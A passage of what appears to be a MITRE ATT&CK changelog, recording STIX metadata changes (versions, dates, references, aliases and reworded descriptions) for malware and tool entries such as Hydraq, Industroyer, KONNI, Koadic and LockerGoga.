|---|---|---|
| modified | 2020-12-22 21:22:34.174000+00:00 | 2022-10-19 22:11:10.040000+00:00 |
| external_references[1]['source_name'] | Securelist Brazilian Banking Malware July 2020 | ESET Grandoreiro April 2020 |
| external_references[1]['description'] | GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020. | ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020. |
| external_references[1]['url'] | https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ | https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/ |
| external_references[2]['source_name'] | ESET Grandoreiro April 2020 | Securelist Brazilian Banking Malware July 2020 |
| external_references[2]['description'] | ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020. | GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020. |
| external_references[2]['url'] | https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/ | https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ |
| Description |
|---|
| [GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 16:15:20.371000+00:00 | 2022-07-29 19:44:21.016000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-09 18:59:27.117000+00:00 | 2022-01-12 16:21:44.692000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015) | [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ | |
| external_references | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | |
| external_references | https://www.symantec.com/connect/blogs/trojanhydraq-incident | |
| external_references | https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf | |
| external_references | https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html | |
| external_references | https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures | |
| external_references | https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-06 19:32:28.374000+00:00 | 2022-04-15 14:57:44.182000+00:00 |
| description | [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015) | [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015) |
| external_references[1]['source_name'] | Hydraq | 9002 RAT |
| external_references[1]['description'] | (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) | (Citation: MicroFocus 9002 Aug 2016) |
| external_references[2]['source_name'] | Aurora | Roarur |
| external_references[2]['description'] | (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | 9002 RAT | MdmBot |
| external_references[3]['description'] | (Citation: MicroFocus 9002 Aug 2016) | (Citation: Novetta-Axiom) |
| external_references[4]['source_name'] | MicroFocus 9002 Aug 2016 | HomeUnix |
| external_references[4]['description'] | Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018. | (Citation: Novetta-Axiom) |
| external_references[5]['source_name'] | Symantec Elderwood Sept 2012 | Homux |
| external_references[5]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | (Citation: Novetta-Axiom) |
| external_references[6]['source_name'] | Symantec Trojan.Hydraq Jan 2010 | HidraQ |
| external_references[6]['description'] | Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018. | (Citation: Novetta-Axiom) |
| external_references[7]['source_name'] | ASERT Seven Pointed Dagger Aug 2015 | HydraQ |
| external_references[7]['description'] | ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018. | (Citation: Novetta-Axiom) |
| external_references[8]['source_name'] | FireEye DeputyDog 9002 November 2013 | McRat |
| external_references[8]['description'] | Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018. | (Citation: Novetta-Axiom) |
| external_references[9]['source_name'] | ProofPoint GoT 9002 Aug 2017 | Hydraq |
| external_references[9]['description'] | Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018. | (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) |
| external_references[10]['source_name'] | FireEye Sunshop Campaign May 2013 | Aurora |
| external_references[10]['description'] | Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018. | (Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010) |
| external_references[11]['source_name'] | PaloAlto 3102 Sept 2015 | ASERT Seven Pointed Dagger Aug 2015 |
| external_references[11]['description'] | Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018. | ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018. |
| external_references[11]['url'] | https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/ | https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'PaloAlto 3102 Sept 2015', 'description': 'Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.', 'url': 'https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/'} | |
| external_references | {'source_name': 'ProofPoint GoT 9002 Aug 2017', 'description': 'Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures'} | |
| external_references | {'source_name': 'FireEye Sunshop Campaign May 2013', 'description': 'Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html'} | |
| external_references | {'source_name': 'FireEye DeputyDog 9002 November 2013', 'description': 'Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html'} | |
| external_references | {'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'} | |
| external_references | {'source_name': 'Symantec Elderwood Sept 2012', 'description': "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", 'url': 'https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf'} | |
| external_references | {'source_name': 'MicroFocus 9002 Aug 2016', 'description': 'Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018.', 'url': 'https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ'} | |
| external_references | {'source_name': 'Symantec Trojan.Hydraq Jan 2010', 'description': 'Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.', 'url': 'https://www.symantec.com/connect/blogs/trojanhydraq-incident'} | |
| x_mitre_aliases | Roarur | |
| x_mitre_aliases | MdmBot | |
| x_mitre_aliases | HomeUnix | |
| x_mitre_aliases | Homux | |
| x_mitre_aliases | HidraQ | |
| x_mitre_aliases | HydraQ | |
| x_mitre_aliases | McRat |
| Description |
|---|
| [HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 19:21:39.068000+00:00 | 2021-11-29 21:48:51.029000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-07 16:02:38.320000+00:00 | 2022-09-27 18:20:48.473000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence', 'Joe Slowik - Dragos'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 19:33:41.189000+00:00 | 2022-10-20 20:37:50.556000+00:00 |
| external_references[3]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf | https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf |
| external_references[4]['url'] | https://dragos.com/blog/crashoverride/CrashOverride-01.pdf | https://dragos.com/blog/crashoverride/CrashOverride-01.pdf |
| external_references[5]['url'] | https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf | https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 17:45:34.380000+00:00 | 2021-11-29 12:41:28.009000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | ['Christiaan Beek, @ChristiaanBeek'] | |
| x_mitre_platforms | ['Windows'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-18 22:02:48.228000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 00:20:21.372000+00:00 | 2022-05-20 17:02:59.587000+00:00 |
| external_references[1]['url'] | https://unit42.paloaltonetworks.com/ironnetinjector/ | https://unit42.paloaltonetworks.com/ironnetinjector/ |
| Old Description | New Description |
|---|---|
| [KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020) | [KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-03 19:32:54.607000+00:00 | 2022-04-13 17:26:25.143000+00:00 |
| description | [KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020) | [KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) |
| external_references[1]['description'] | (Citation: Talos Konni May 2017) | (Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) |
| external_references[2]['source_name'] | Talos Konni May 2017 | Unit 42 Nokki Oct 2018 |
| external_references[2]['description'] | Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. | Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018. |
| external_references[2]['url'] | https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html | https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/ |
| external_references[4]['source_name'] | Unit 42 Nokki Oct 2018 | Medium KONNI Jan 2020 |
| external_references[4]['description'] | Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018. | Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020. |
| external_references[4]['url'] | https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/ | https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b |
| external_references[5]['source_name'] | Medium KONNI Jan 2020 | Talos Konni May 2017 |
| external_references[5]['description'] | Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020. | Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. |
| external_references[5]['url'] | https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b | https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html |
| x_mitre_version | 1.4 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Malwarebytes Konni Aug 2021', 'description': 'Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.', 'url': 'https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/'} |
| Description |
|---|
| [KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 14:18:07.086000+00:00 | 2022-05-11 14:00:00.188000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018) | [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:55:29.911000+00:00 | 2022-04-06 19:32:33.511000+00:00 |
| description | [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018) | [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021) |
| external_references[1]['description'] | (Citation: Github Koadic) | (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) |
| external_references[2]['source_name'] | Github Koadic | MalwareBytes LazyScripter Feb 2021 |
| external_references[2]['description'] | Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. |
| external_references[2]['url'] | https://github.com/zerosum0x0/koadic | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Github Koadic', 'description': 'Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.', 'url': 'https://github.com/zerosum0x0/koadic'} | |
| Old Description | New Description |
|---|---|
| [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) | [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Joe Slowik - Dragos'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:56:22.049000+00:00 | 2022-05-23 21:22:58.477000+00:00 |
| description | [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) | [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) |
| external_references[1]['source_name'] | Unit42 LockerGoga 2019 | CarbonBlack LockerGoga 2019 |
| external_references[1]['description'] | Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. | CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019. |
| external_references[1]['url'] | https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/ | https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/ |
| external_references[2]['source_name'] | CarbonBlack LockerGoga 2019 | Unit42 LockerGoga 2019 |
| external_references[2]['description'] | CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019. | Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. |
